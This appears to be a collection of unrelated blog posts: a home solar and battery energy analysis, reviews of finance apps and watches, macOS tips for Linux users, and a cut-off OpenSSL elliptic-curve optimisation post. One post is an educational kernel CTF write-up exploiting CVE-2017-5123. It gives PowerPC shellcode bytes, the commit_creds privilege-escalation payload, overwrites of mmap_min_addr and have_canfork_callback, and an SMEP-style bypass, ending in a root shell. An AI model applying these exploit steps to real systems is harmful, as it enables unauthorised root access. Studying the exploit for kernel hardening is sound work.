Overall, 2022-2023 had a similar shape to 2021-2022, including the fact that in both these years we missed three weeks of solar generation in late summer. In 2022 this was due to replacing the MPPT, and in 2023 it was because we replaced the roof. In both cases our PV generation was lower than it should have been by an estimated 500-600kW. Hopefully nothing like this happens again in future years.
All of our numbers in 2022-2023 were a bit higher than in 2021-2022. We pulled 4.75% more power from the grid, generated 1.84% more solar, the total power going into the system (grid + solar) was 3.59% higher, our loads used 6.31% more power, and we exported 5.97% more power than the previous year.
I honestly don’t know why our loads used more power this year. Here’s a table showing our consumption for both years, and the differences each month (note that September 2022 is only approximate because of how the years don’t quite line up):
| Month | 2022 | 2023 | Diff |
|---|---|---|---|
| October | 988 | 873 | -115 |
| November | 866 | 805 | -61 |
| December | 767 | 965 | 198 |
| January | 822 | 775 | -47 |
| February | 638 | 721 | 83 |
| March | 813 | 911 | 98 |
| April | 775 | 1,115 | 340 |
| May | 953 | 1,098 | 145 |
| June | 1,073 | 1,149 | 76 |
| July | 1,118 | 1,103 | -15 |
| August | 966 | 1,065 | 99 |
| September | 1,070 | 964 | -116 |
Here’s a graph:
Did we use more cooling this December? Did we use more heating this April and May? I dug the nearest weather station’s monthly mean minimum and maximum temperatures out of the BOM Climate Data Online tool and found that there’s maybe a degree or so variance one way or the other each month year to year, so I don’t know what I can infer from that. All I can say is that something happened in December and April, but I don’t know what.
Another interesting thing is that what I referred to as “the energy cost of the system” in TANSTAAFL has gone down. That’s the kW figure below in the “what?” column, which is the difference between grid in + solar in – loads – export, i.e. the power consumed by the system itself. In 2021-2022, that was 2,568 kW, or about 18% of the total power that went into the system. In 2022-2023 it was down to 2,347kWh, or just under 16%:
| Year | Grid In | Solar In | Total In | Loads | Export | Total Out | what? |
|---|---|---|---|---|---|---|---|
| 2021-2022 | 8,531 | 5,640 | 14,171 | 10,849 | 754 | 11,603 | 2,568 |
| 2022-2023 | 8,936 | 5,744 | 14,680 | 11,534 | 799 | 12,333 | 2,347 |
I suspect the cause of this reduction is that we didn’t spend two and a half months doing lots of grid charging of the battery in 2022-2023. If that’s the case, this again points to the advisability of just letting the system do its thing and not messing with it too much unless you really know you need to.
The last set of numbers I have involve actual money. Here’s what our electricity bills looked like over the past five years:
| Year | From Grid | Total Bill | Cost/kWh |
|---|---|---|---|
| 2018-2019 | 9,031 | $2,278.33 | $0.25 |
| 2019-2020 | 9,324 | $2,384.79 | $0.26 |
| 2020-2021 | 7,582 | $1,921.77 | $0.25 |
| 2021-2022 | 8,531 | $1,731.40 | $0.20 |
| 2022-2023 | 8,936 | $1,989.12 | $0.22 |
Note that cost/kWh as I have it here is simply the total dollar amount of our bills divided by the total power drawn from the grid (I’m deliberately ignoring the additional power we use that comes from the sun in this calculation). The bills themselves say “peak power costs $X, off-peak costs $Y, you get $Z back for power exported and there’s a daily supply charge of $SUCKS_TO_BE_YOU”, but that’s all noise. What ultimately matters in my opinion is what I call the effective cost per kilowatt hour, which is why those things are all smooshed together here. The important point is that with our existing solar array we were previously effectively paying about $0.25 per kWh for grid power. After getting the battery and switching to Peak & Off-Peak billing, that went down to $0.20/kWh – a reduction of 20%. Now we’ve inched back up to $0.22/kWh, but it turns out that’s just because power prices have increased. As far as I can tell Aurora Energy don’t publish historical pricing data, so as a public service, I’ll include what I’ve been able to glean from our prior bills here:
It’s nice that the feed-in tariff (i.e. what you get credited when you export power) has gone up quite a bit, but unless you’re somehow able to export 2-3x more power than you import, you’ll never get ahead of the ~20% increase in power prices over the last two years.
Having calculated the effective cost/kWh for grid power, I’m now going to do one more thing which I didn’t think to do during last year’s analysis, and that’s calculate the effective cost/kWh of running our loads, bearing in mind that they’re partially powered from the grid, and partially from the sun. I’ve managed to dig up some old Aurora bills from 2016-2017, back before we put the solar panels on. This should make for an interesting comparison.
| Year | From Grid | Total Bill | Grid $/kWh | Loads | Loads $/kWh |
|---|---|---|---|---|---|
| 2016-2017 | 17,026 | $4,485.45 | $0.26 | 17,026 | $0.26 |
| 2018-2019 | 9,031 | $2,278.33 | $0.25 | 11,827 | $0.19 |
| 2019-2020 | 9,324 | $2,384.79 | $0.26 | 12,255 | $0.19 |
| 2020-2021 | 7,582 | $1,921.77 | $0.25 | 10,358 | $0.19 |
| 2021-2022 | 8,531 | $1,731.40 | $0.20 | 10,849 | $0.16 |
| 2022-2023 | 8,936 | $1,989.12 | $0.22 | 11,534 | $0.17 |
The first thing to note is the horrifying 17 megawatts we pulled in 2016-2017. Given the hot water and lounge room heat pump were on a separate tariff, I was able to determine that four of those megawatts (i.e. about 24% of our power usage) went on heating that year. Replacing the crusty old conventional electric hot water system with a Sanden heat pump hot water service cut that in half – subsequent years showed the heating/hot water tariff using about 2MW/year. We obviously also somehow reduced our loads by another ~3MW/year on top of that, but I can’t find the Aurora bills for 2017-2018 so I’m not sure exactly when that drop happened. My best guess is that I probably got rid of some old, always-on computer equipment.
The second thing to note is how the cost of running the loads drops. In 2016-2017 the grid cost/kWh is the same as the loads cost/kWh, because grid power is all we had. From 2018-2021 though, the load cost/kWh drops to $0.19, a saving of about 26%. It remains there until 2021-2022 when we got the battery and it dropped again to $0.16 (another 15% or so). So the big win was certainly putting the solar panels on and swapping the hot water system, with the battery being a decent improvement on top of that.
Further wins are going to come from decreasing our power consumption. In previous posts I had mentioned the need to replace panel heaters with heat pumps, and also that some of our aging computer equipment needed upgrading. We did finally get a heat pump installed in the master bedroom this year, and we replaced the old undersized lounge room heat pump with a new correctly sized unit. This happened on June 30 though, so will have had minimal impact on this years’ figures. Likewise an always-on computer that previously pulled ~100W is now better, stronger and faster in all respects, while only pulling ~50W. That will save us ~438kW of power per year, but given the upgrade happened in mid August, again we won’t see the full effects until later.
I’m looking forward to doing another one of these posts in a year’s time. Hopefully I will have nothing at all interesting to report.
I (relatively) recently went down the rabbit hole of trying out personal finance apps to help get a better grip on, well, the things you’d expect (personal finances and planning around them).
In the past, I’ve had an off-again-on-again relationship with GNUCash. I did give it a solid go for a few months in 2004/2005 it seems (I found my old files) and I even had the OFX exports of transactions for a limited amount of time for a limited number of bank accounts! Amazingly, there’s a GNUCash port to macOS, and it’ll happily open up this file from what is alarmingly close to 20 years ago.
Back in those times, running Linux on the desktop was even more of an adventure than it has been since then, and I always found GNUCash to be strange (possibly a theme with me and personal finance software), but generally fine. It doesn’t seem to have changed a great deal in the years since. You still have to manually import data from your bank unless you happen to be lucky enough to live in the very limited number of places where there’s some kind of automation for it.
So, going back to GNUCash was an option. But I wanted to survey the land of what was available, and if it was possible to exchange money for convenience. I am not big on the motivation to go and spend a lot of time on this kind of thing anyway, so it had to be easy for me to do so.
For my requirements, I basically had:
I viewed a mobile app (iOS) as a Nice to Have rather than essential. Given that, my shortlist was:
I’ve used it before, its web site at https://www.gnucash.org/ looks much the same as it always has. It’s Free and Open Source Software, and is thus well aligned with my values, and that’s a big step towards not having vendor lock-in.
I honestly could probably make it work. I wish it had the ability to import transactions from banks for anywhere I have ever lived or banked with. I also wish the UI got to be a bit more consistent and modern, and even remotely Mac like on the Mac version.
Honestly, if the deal was that a web service would pull bank transactions in exchange for ~$10/month and also fund GNUCash development… I’d struggle to say no.
Here’s an option that has been around forever – https://www.quicken.com/ – and one that I figured I should solidly look at. It’s actually one I even spent money on…. before requesting a refund. It’s Import/Export is so broken it’s an insult to broken software everywhere.
Did you know that Quicken doesn’t import the Quicken Interchange Format (QIF), and hasn’t since 2005?
Me, incredulously, when trying out quicken
I don’t understand why you wouldn’t support as many as possible formats that banks export your transaction data as. It cannot possibly be that hard to parse these things, nor can it possibly be code that requires a lot of maintenance.
This basically meant that I couldn’t import data from my Australian Banks. Urgh. This alone ruled it out.
It really didn’t build confidence in ever getting my data out. At every turn it seemed to be really keen on locking you into Quicken rather than having a good experience all-up.
This one was new to me – https://www.wiz.money/ – and had a fancy URL and everything. I spent a bunch of time trying MoneyWiz, and I concluded that it is pretty, but buggy. I had managed to create a report where it said I’d earned $0, but you click into it, and then it gives actual numbers. Not being self consistent and getting the numbers wrong, when this is literally the only function of said app (to get the numbers right), took this out of the running.
It did sync from my US and Australian banks though, so points there.
Intuit used to own Quicken until it sold it to H.I.G. Capital in 2016 (according to Wikipedia). I have no idea if that has had an impact as to the feature set / usability of Quicken, but they now have this Cloud-only product called Mint.
The big issue I had with Mint was that there didn’t seem to be any way to get your data out of it. It seemed to exemplify vendor lock-in. This seems to have changed a bit since I was originally looking, which is good (maybe I just couldn’t find it?). But with the cloud-only approach I wasn’t hugely comfortable with having everything there. It also seemed to be lacking a few features that I was begging to find useful in other places.
It is the only product that links with the Apple Card though. No idea why that is the case.
The price tag of $0 was pretty unbeatable, which does make me wonder where the money is made from to fund its development and maintenance. My guess is that it’s through commission on the various financial products advertised through it, and I dearly hope it is not through selling data on its users (I have no reason to believe it is, there’s just the popular habit of companies doing this).
This is what I’ve settled on. It seemed to be easy enough for me to figure out how to use, sync with an iPhone App, be a reasonable price, and be able to import and sync things from accounts that I have. Oddly enough, nothing can connect and pull things from the Apple Card – which is really weird. That isn’t a Banktivity thing though, that’s just universal (except for Intuit’s Mint).
I’ve been using it for a bit more than a year now, and am still pretty happy. I wish there was the ability to attach a PDF of a statement to the Statement that you reconcile. I wish I could better tune the auto match/classification rules, and a few other relatively minor things.
Periodically in life I’ve had the desire to be somewhat fit, or at least have the benefits that come with that such as not dying early and being able to navigate a mountain (or just the city of Seattle) on foot without collapsing. I have also found that holding myself accountable via data is pretty vital to me actually going and repeatedly doing something.
So, at some point I got myself a Garmin watch. The year was 2012 and it was a Garmin Forerunner 410. It had a standard black/grey LCD screen, GPS (where getting a GPS lock could be utterly infuriatingly slow), a sensor you attached to your foot, a sensor you strap to your chest for Heart Rate monitoring, and an ANT+ dongle for connecting to a PC to download your activities. There was even some open source software that someone wrote so I could actually get data off my watch on my Linux laptops. This wasn’t a smart watch – it was exclusively for wearing while exercising and tracking an activity, otherwise it was just a watch.
However, as I was ramping up to marathon distance running, one huge flaw emerged: I was not fast enough to run a marathon in the time that the battery in my Garmin lasted. IIRC it would end up dying around 3hr30min into something, which at the time was increasingly something I’d describe as “not going for too long of a run”. So, the search for a replacement began!
The year was 2017, and the Garmin fenix 5x attracted me for two big reasons: a battery life to be respected, and turn-by-turn navigation. At the time, I seldom went running with a phone, preferring a tiny SanDisk media play (RIP, they made a new version that completely sucked) and a watch. The attraction of being able to get better maps back to where I started (e.g. a hotel in some strange city where I didn’t speak the language) was very appealing. It also had (what I would now describe as) rudimentary smart-watch features. It didn’t have even remotely everything the Pebble had, but it was enough.
So, a (non-trivial) pile of money later (even with discounts), I had myself a shiny and virtually indestructible new Garmin. I didn’t even need a dongle to sync it anywhere – it could just upload via its own WiFi connection, or through Bluetooth to the Garmin Connect app to my phone. I could also (if I ever remembered to), plug in the USB cable to it and download the activities to my computer.
One problem: my skin rebelled against the Garmin fenix 5x after a while. Like, properly rebelled. If it wasn’t coming off, I wanted to rip it off. I tried all of the tricks that are posted anywhere online. Didn’t help. I even got tested for what was the most likely culprit (a Nickel allergy), and didn’t have one of them, so I (still) have no idea what I’m actually allergic to in it. It’s just that I cannot wear it constantly. Urgh. I was enjoying the daily smart watch uses too!
So, that’s one rather expensive watch that is special purpose only, and even then started to get to be a bit of an issue around longer activities. Urgh.
So the hunt began for a smart watch that I could wear constantly. This usually ends in frustration as anything I wanted was hundreds of $ and pretty much nobody listed what materials were in it apart from “stainless steel”, “may contain”, and some disclaimer about “other materials”, which wasn’t a particularly useful starting point for “it is one of these things that my skin doesn’t like”. As at least if the next one also turned out to cause me problems, I could at least have a list of things that I could then narrow down to what I needed to avoid.
So that was all annoying, with the end result being that I went a long time without really wearing a watch. Why? The search resumed periodically and ended up either with nothing, or totally nothing. That was except if I wanted to get further into some vendor lock-in.
Honestly, the only manufacturer of anything smartwatch like which actually listed everything and had some options was Apple. Bizarre. Well, since I already got on the iPhone bandwagon, this was possible. Rather annoyingly, they are very tied together and thus it makes it a bit of a vendor-lock-in if you alternate phone and watch replacement and at any point wish to switch platforms.
That being said though, it does work well and not irritate my skin. So that’s a bonus! If I get back into marathon level distance running, we’ll see how well it goes. But for more common distances that I’ve run or cycled with it… the accuracy seems decent, HR monitor never just sometimes decides I’m not exerting myself, and the GPS actually gets a lock in reasonable time. Plus it can pair with headphones and be the only thing I take out with me.
A few random notes about things that can make life on macOS (the modern one, as in, circa 2023) better for those coming from Linux.
For various reasons you may end up with Mac hardware with macOS on the metal rather than Linux. This could be anything from battery life of the Apple Silicon machines (and not quite being ready to jump on the Asahi Linux bandwagon), to being able to run the corporate suite of Enterprise Software (arguably a bug more than a feature), to some other reason that is also fine.
My approach to most of my development is to have a remote more powerful Linux machine to do the heavy lifting, or do Linux development on Linux, and not bank on messing around with a bunch of software on macOS that would approximate something on Linux. This also means I can move my GUI environment (the Mac) easily forward without worrying about whatever weird workarounds I needed to do in order to get things going for whatever development work I’m doing, and vice-versa.
Terminal emulator? iTerm2. The built in Terminal.app is fine, but there’s more than a few nice things in iTerm2, including tmux integration which can end up making it feel a lot more like a regular Linux machine. I should probably go read the tmux integration best practices before I complain about some random bugs I think I’ve hit, so let’s pretend I did that and everything is perfect.
I tend to use the Mac for SSHing to bigger Linux machines for most of my work. At work, that’s mostly to a Graviton 2 EC2 Instance running Amazon Linux with all my development environments on it. At home, it’s mostly a Raptor Blackbird POWER9 system running Fedora.
Running Linux locally? For all the use cases of containers, Podman Desktop or finch. There’s a GUI part of Podman which is nice, and finch I know about because of the relatively nearby team that works on it, and its relationship to lima. Lima positions itself as WSL2-like but for Mac. There’s UTM for a full virtual machine / qemu environment, although I rarely end up using this and am more commonly using a container or just SSHing to a bigger Linux box.
There’s XCode for any macOS development that may be needed (e.g. when you want that extra feature in UTM or something) I do use Homebrew to install a few things locally.
Have a read of Andrew‘s blog post on OpenBMC Development on an Apple M1 MacBook Pro too.
Instead of writing mitigations, memory protections and sanitisers all day, I figured it'd be fun to get the team to try playing for the other team. It's a fun set of skills to learn, and it's a very hands-on way to understand why kernel hardening is so important. To that end, I decided to concoct a simple kernel CTF and enforce some mandatory fun. Putting this together, I had a few rules:
So I threw something together and I think it did a decent job of meeting those targets, so let's go through it!
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
}
if (!err) {
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
user_access_begin();
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user((short)info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_access_end();
return err;
Efault:
user_access_end();
return -EFAULT;
}
This is the implementation of the waitid syscall in Linux v4.13, released in
September 2017. For our purposes it doesn't matter what the syscall is supposed
to do - there's a serious bug here that will let us do very naughty things. Try
and spot it yourself, though it may not be obvious unless you're familiar with
the kernel's user access routines.
#define put_user(x, ptr) \
({ \
__typeof__(*(ptr)) __user *_pu_addr = (ptr); \
\
access_ok(_pu_addr, sizeof(*(ptr))) ? \
__put_user(x, _pu_addr) : -EFAULT; \
})
This is put_user() from arch/powerpc/include/asm/uaccess.h. The
implementation goes deeper, but this tells us that the normal way the kernel
would write to user memory involves calling access_ok() and only performing
the write if the access was indeed OK (meaning the address is in user memory,
not kernel memory). As the name may suggest, unsafe_put_user() skips that
part, and for good reason - sometimes you want to do multiple user accesses at
once. With SMAP/PAN/KUAP etc enabled, every put_user() will enable user
access, perform its operation then disable it again, which is very inefficient.
Instead, patterns like in waitid above are rather common - enable user access,
perform a bunch of "unsafe" operations and then disable user access again.
The bug in waitid is that access_ok() is never called, and thus there is no
validation that the user provided pointer *infop is pointing to user memory
instead of kernel memory. Calling waitid and pointing into kernel memory
allows unprivileged users to write into whatever they're pointing at. Neat!
This is CVE-2017-5123,
summarised as "Insufficient data validation in waitid allowed an user to escape
sandboxes on Linux". It's a primitive that can be used for more than that, but
that's what its discoverer used it for, escaping the Chrome
sandbox.
If you're curious, there's a handful of different writeups exploiting this bug for different things that you can search for. I suppose I'm now joining them!
Failing to enforce that a user-provided address to write to is actually in userspace is a hefty mistake, one that wasn't caught until after the code made it all the way to a tagged release (though the only distro release I could find with it was Ubuntu 17.10-beta2). Linux is big, complicated, fast-moving, and all that - there's always going to be bugs. It's not possible to prevent the entire developer base from ever making mistakes, but you can design better APIs so mistakes like this are much less likely to happen.
Let's have a look at the waitid syscall implementation as it is in upstream
Linux at the time of writing.
SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *,
infop, int, options, struct rusage __user *, ru)
{
struct rusage r;
struct waitid_info info = {.status = 0};
long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
int signo = 0;
if (err > 0) {
signo = SIGCHLD;
err = 0;
if (ru && copy_to_user(ru, &r, sizeof(struct rusage)))
return -EFAULT;
}
if (!infop)
return err;
if (!user_write_access_begin(infop, sizeof(*infop)))
return -EFAULT;
unsafe_put_user(signo, &infop->si_signo, Efault);
unsafe_put_user(0, &infop->si_errno, Efault);
unsafe_put_user(info.cause, &infop->si_code, Efault);
unsafe_put_user(info.pid, &infop->si_pid, Efault);
unsafe_put_user(info.uid, &infop->si_uid, Efault);
unsafe_put_user(info.status, &infop->si_status, Efault);
user_write_access_end();
return err;
Efault:
user_write_access_end();
return -EFAULT;
}
Notice any differences? Not a lot has changed, but instead of an unconditional
user_access_begin(), there's now a call to user_write_access_begin(). Not
only have the user access functions been split into read and write (though
whether there's actually read/write granularity under the hood depends on the
MMU-specific implementation), but the _begin() function takes a pointer and
the size of the write. And what do you think that's doing...
static __must_check inline bool
user_write_access_begin(const void __user *ptr, size_t len)
{
if (unlikely(!access_ok(ptr, len)))
return false;
might_fault();
allow_write_to_user((void __user *)ptr, len);
return true;
}
That's right! The missing access_ok() check from v4.13 is now part of the API
for enabling user access, so you can't forget it (without trying really hard).
If there's something else you should be doing every time you call a function
(i.e. access_ok() when calling user_access_begin()), it should probably just
be part of the function, especially if there's a security implication.
This bug was fixed by adding in the missing access_ok() check, but it's very
cool to see that bugs like this are now much less likely to get written.
Before we do anything too interesting, we should figure out what we actually
have here. We point our pointer at 0xc000000012345678 (an arbitrary kernel
address) then take a look in gdb, revealing the following:
pwndbg> x/10 0xc000000012345678
0xc000000012345678: 17 0 1 0
0xc000000012345688: 2141 1001 1 0
So we know that we can at least set something to zero, and there's some
potential for more mischief. We could fork() a lot to change the value of the
PID to make our write a bit more arbitrary, but to not get too fancy I figured
we should just see where we could get by setting something either to zero or to
something non-zero.
A few targets came to mind. We could spray around where we think creds are
located to try and overwrite the effective user ID of a process to 0, making it
run as root. We could go after something like SELinux, aiming for flags like
selinux_enabled and selinux_enforcing. I'm sure there's other sandbox-type
controls we could try and escape from, too.
None of these were taking my CTF in the direction I wanted it to go (which was
shellcode running in the kernel), so I decided to turn the realism down a notch
and aim for exploiting a null pointer dereference. We'd map our shellcode to
*0, induce a null pointer dereference in the kernel, and then our exploit
would work. Right?
So we're just going to go for a classic privilege escalation. We start as an unprivileged user and end up as root. Easy.
I found an existing exploit doing
the same thing I wanted to do, so I just stole the target from that. It has
some comments in French which don't really help me, but thankfully I found
another version with some additional comments - in Chinese. Oh well.
have_canfork_callback is a symbol that marks whether cgroup subsystems have a
can_fork() callback that is checked when a fork is attempted. If we overwrite
have_canfork_callback to be non-zero when can_fork is still NULL, then we
win! We can reliably reproduce a null pointer dereference as soon as we
fork().
I'm sure there's heaps of different symbols we could have hit, but this one has
some nice properties. Any non-zero write is enough, we can trigger the
dereference at a time in our control with fork(), and to cover our bases we
can just set it back to 0 later.
In our case, we had debug info and a debugger, so finding where the symbol was
located in memory is pretty easy. There's also /proc/kallsyms which is great
if it's enabled. Linux on Power doesn't yet support KASLR which also saves us a
headache or two here, and you can feel free to ask me why it's low on the
priority list.
So now we have a null pointer dereference. Now let's get that doing something!
Virtual memory is one heck of a drug. If the kernel is going to execute from
0x0, we just need to mmap() to 0! Easy.
Well, it's not that easy. Turning any null pointer dereference into an easy
attack vector is not ideal, so users aren't allowed to mmap to low address
ranges, in our case, below PAGE_SIZE. Surely there's nothing in the kernel
that would try to dereference a pointer + PAGE_SIZE? Maybe that's for a
future CTF...
There's a sysctl for this, so in the actual CTF we just did sysctl -w
vm.mmap_min_addr=0 and moved on for brevity. As I was writing this I decided
to make sure it was possible to bypass this without cheating by making use of
our kernel write primitive, and sure enough, it works! I had to zero out both
mmap_min_addr and dac_mmap_min_addr symbols, the latter seemingly required
for filesystem interactions to work post-exploit.
So now we can trigger a null pointer dereference in the kernel and we can
mmap() our shellcode to 0x0, we should probably get some shellcode. We want
to escalate our privileges, and the easiest way to do that is the iconic
commit_creds(prepare_kernel_cred(0)).
prepare_kernel_cred() is intended to produce a credential for a kernel task.
Passing 0/NULL gets you the same credential that init runs with, which is
about as escalated as our privileges can get. commit_creds() applies the
given credential to the currently running task - thus making our exploit run as
root.
As of somewhat recently it's a bit more complex than that, but we're still back in v4.13, so we just need a way to execute that from a triggered null pointer dereference.
The blessing and curse of Power being a niche architecture is that it's hard to find existing exploits for. Perhaps lacking in grace and finesse, but effective nonetheless, is the shellcode I wrote myself:
static const unsigned char shellcode[] = {
0x00, 0x00, 0xc0, 0x3b, // li r30, 0
0x20, 0x00, 0x9e, 0xe9, // ld r12,32(r30)
0x00, 0x00, 0xcc, 0xfb, // std r30,0(r12)
0x18, 0x00, 0x9e, 0xe9, // ld r12,24(r30)
0xa6, 0x03, 0x89, 0x7d, // mtctr r12
0x20, 0x04, 0x80, 0x4e, // bctr
};
After the CTF I encouraged everyone to try writing their own shellcode and noone did, and I will take that as a sign that mine is flawlessly designed.
First we throw 0 into r30, which sounds like a register we'll get away with
clobbering. We load an offset of 32 bytes from the value of r30 into r12
(and r30 is 0, so this is the address 32). Then, we store the value of r30
(which is 0) into the address in r12 - writing zero to the address found at
*32.
Then, we replace the contents of r12 with the value contained at address 24.
Then, we move that value into the count register, and branch to the count
register - redirecting execution to the address found at *24.
I wrote it this way so participants would have to understand what the shellcode was trying to do to be able to get any use out of it. It expects two addresses to be placed immediately after it terminates and it's up to you to figure out what those addresses should be!
In our case, everyone figured out pretty quickly that *24 should point at our very classic privesc:
void get_root() {
if (commit_creds && prepare_kernel_cred)
commit_creds(prepare_kernel_cred(0));
}
Addresses for those kernel symbols need to be obtained first, but we're experts at that now. So we add in:
*(unsigned long *)24 = (unsigned long)get_root;
And that part's sorted. How good is C?
Noone guessed what address we were zeroing, though, and the answer is
have_canfork_callback. Without mending that, the kernel will keep attempting
to execute from address 0, which we don't want. We only need it to do that
once!
So we wrap up with
*(unsigned long *)32 = have_canfork_callback;
and our shellcode's ready to go!
We've had good progress so far - we needed a way to get the kernel to execute
from address 0 and we found a way to do that, and we needed to mmap to 0 and
we found a way to do that. And yet, running the exploit doesn't work. How
come?
Unable to handle kernel paging request for instruction fetch
Faulting instruction address: 0x00000000
Oops: Kernel access of bad area, sig: 11 [#2]
The MMU has ended our fun. KUEP is enabled (SMEP on x86, PXN on ARM) so the MMU
is enforcing that the kernel can't execute from user addresses. I gave everyone
a bit of a trick question here - how can you get around this purely from the
qemu command line?
The way I did it wasn't to parse nosmep (and I'm not even sure that was
implemented for powerpc in v4.13 anyway), it was to change from -cpu POWER9 to
-cpu POWER8. Userspace execution prevention wasn't implemented in the MMU
until POWER9, so reverting to an older processor was a cheeky way to get around
that.
Putting all of that together, we have a successful privilege escalation from attacking the kernel.
/ $ ./exploit
Overwriting mmap_min_addr...
Overwriting dac_mmap_min_addr...
Overwriting have_canfork_callback...
Successfully acquired root shell!
/ # whoami
root
It's wild to think that even an exploit this simple would have been possible in the "real world" back in 2017, so it really highlights the value of kernel hardening! It made for a good introduction to kernel exploitation for me and my team and wasn't too contrived for the sake of simplicity.
Whether you're a beginner or an expert at kernel exploitation (or somewhere vaguely in the middle like me), I hope you found this interesting. There's lots of great PoCs, writeups and papers out there to learn from and CTFs to try if you want to learn more!
So I've just managed to upstream some changes to OpenSSL for a new strategy I've developed for efficient arithmetic used in secp384r1, a curve prescribed by NIST for digital signatures and key exchange. In spite of its prevalence, its implementation in OpenSSL has remained somewhat unoptimised, even as less frequently used curves (P224, P256, P521) each have their own optimisations.
The strategy I have used could be called a 56-bit redundant limb implementation with Solinas reduction. Without too much micro-optimisation, we get ~5.5x speedup over the default (Montgomery Multiplication) implementation for creation of digital signatures.
How is this possible? Well first let's quickly explain some language:
When it comes to cryptography, it's highly likely that those with a computer science background will be familiar with ideas such as key-exchange and private-key signing. The stand-in asymmetric cipher in a typical computer science curriculum is typically RSA. However, the heyday of Elliptic Curve ciphers has well and truly arrived, and their operation seems no less mystical than when they were just a toy for academia.
The word 'Elliptic' may seem to imply continuous mathematics. As a useful cryptographic problem, we fundamentally are just interested with the algebraic properties of these curves, whose points are elements of a finite field. Irrespective of the underlying finite field, the algebraic properties of the elliptic curve group can be shown to exist by an application of Bézout's Theorem. The group operator on points on an elliptic curve for a particular choice of field involves the intersection of lines intersecting either once, twice or thrice with the curve, granting notions of addition and doubling for the points of intersection, and giving the 'point at infinity' as the group identity. A closed form exists for computing a point double/addition in arbitrary fields (different closed forms can apply, but determined by the field's characteristic, and the same closed form applies for all large prime fields).
Our algorithm uses a field of the form \(\mathbb{F}_p\), that is the unique field with \(p\) (a prime) elements. The most straightforward construction of this field is arithmetic modulo \(p\). The other finite fields used in practise in ECC are of the form \(\mathbb{F}_{2^m}\) and are sometimes called 'binary fields' (representible as polynomials with binary coefficients). Their field structure is also used in AES through byte substitution, implemented by inversion modulo \(\mathbb{F}_{2^8}\).
From a performance perspective, great optimisations can be made by implementing efficient fixed-point arithmetic specialised to modulo by single prime constant, \(p\). From here on out, I'll be speaking from this abstraction layer alone.
We wish to multiply two \(m\)-bit numbers, each of which represented with \(n\) 64-bit machine words in some way. Let's suppose just for now that \(n\) divides \(m\) neatly, then the quotient \(d\) is the minimum number of bits in each machine word that will be required for representing our number. Suppose we use the straightforward representation whereby the least significant \(d\) bits are used for storing parts of our number, which we better call \(x\) because this is crypto and descriptive variable names are considered harmful (apparently).
If we then drop the requirement for each of our \(n\) machine words (also referred to as a 'limb' from hereon out) to have no more than the least significant \(d\) bits populated, we say that such an implementation uses 'redundant limbs', meaning that the \(k\)-th limb has high bits which overlap with the place values represented in the \((k+1)\)-th limb.
The fundamental difficulty with making modulo arithmetic fast is to do with the following property of multiplication.
Let \(a\) and \(b\) be \(m\)-bit numbers, then \(0 \leq a < 2^m\) and \(0 \leq b < 2^m\), but critically we cannot say the same about \(ab\). Instead, the best we can say is that \(0 \leq ab < 2^{2m}\). Multiplication can in the worst case double the number of bits that must be stored, unless we can reduce modulo our prime.
If we begin with non-redundant, 56-bit limbs, then for \(a\) and \(b\) not too much larger than \(2^{384} > p_{384}\) that are 'reduced sufficiently' then we can multiply our limbs in the following ladder, so long as we are capable of storing the following sums without overflow.
/* and so on ... */
out[5] = ((uint128_t) in1[0]) * in2[5]
+ ((uint128_t) in1[1]) * in2[4]
+ ((uint128_t) in1[2]) * in2[3]
+ ((uint128_t) in1[3]) * in2[2]
+ ((uint128_t) in1[4]) * in2[1]
+ ((uint128_t) in1[5]) * in2[0];
out[6] = ((uint128_t) in1[0]) * in2[6]
+ ((uint128_t) in1[1]) * in2[5]
+ ((uint128_t) in1[2]) * in2[4]
+ ((uint128_t) in1[3]) * in2[3]
+ ((uint128_t) in1[4]) * in2[2]
+ ((uint128_t) in1[5]) * in2[1]
+ ((uint128_t) in1[6]) * in2[0];
out[7] = ((uint128_t) in1[1]) * in2[6]
+ ((uint128_t) in1[2]) * in2[5]
+ ((uint128_t) in1[3]) * in2[4]
+ ((uint128_t) in1[4]) * in2[3]
+ ((uint128_t) in1[5]) * in2[2]
+ ((uint128_t) in1[6]) * in2[1];
out[8] = ((uint128_t) in1[2]) * in2[6]
+ ((uint128_t) in1[3]) * in2[5]
+ ((uint128_t) in1[4]) * in2[4]
+ ((uint128_t) in1[5]) * in2[3]
+ ((uint128_t) in1[6]) * in2[2];
/* ... and so forth */
This is possible, if we back each of the 56-bit limbs with a 64-bit machine word, with products being stored in 128-bit machine words. The numbers \(a\) and \(b\) were able to be stored with 7 limbs, whereas we use 13 limbs for storing the product. If \(a\) and \(b\) were stored non-redundantly, than each of the output (redundant) limbs must contain values less than \(6 \cdot 2^{56} \cdot 2^{56} < 2^{115}\), so there is no possibility of overflow in 128 bits. We even have room spare to do some additions/subtractions in cheap, redundant limb arithmetic.
But we can't keep doing our sums in redundant limb arithmetic forever, we must eventually reduce. Doing so may be expensive, and so we would rather reduce only when strictly necessary!
Our prime is a Solinas (Pseudo/Generalised-Mersenne) Prime. Mersenne Primes are primes expressible as \(2^m - 1\). This can be generalised to low-degree polynomials in \(2^m\). For example, another NIST curve uses \(p_{224} = 2^{224} - 2^{96} + 1\) (a 224-bit number) where \(p_{224} = f(2^{32})\) for \(f(t) = t^7 - t^3 + 1\). The simpler the choice of polynomial, the simpler the modular reduction logic.
Our choice of \(t\) is \(2^{56}\). Wikipedia the ideal case for Solinas reduction where the bitwidth of the prime is divisible by \(\log_2{t}\), but that is not our scenario. We choose 56-bits for some pretty simple realities of hardware. 56 is less than 64 (standard machine word size) but not by too much, and the difference is byte-addressible (\(64-56=8\)). Let me explain:
Let's first describe the actual prime that is our modulus.
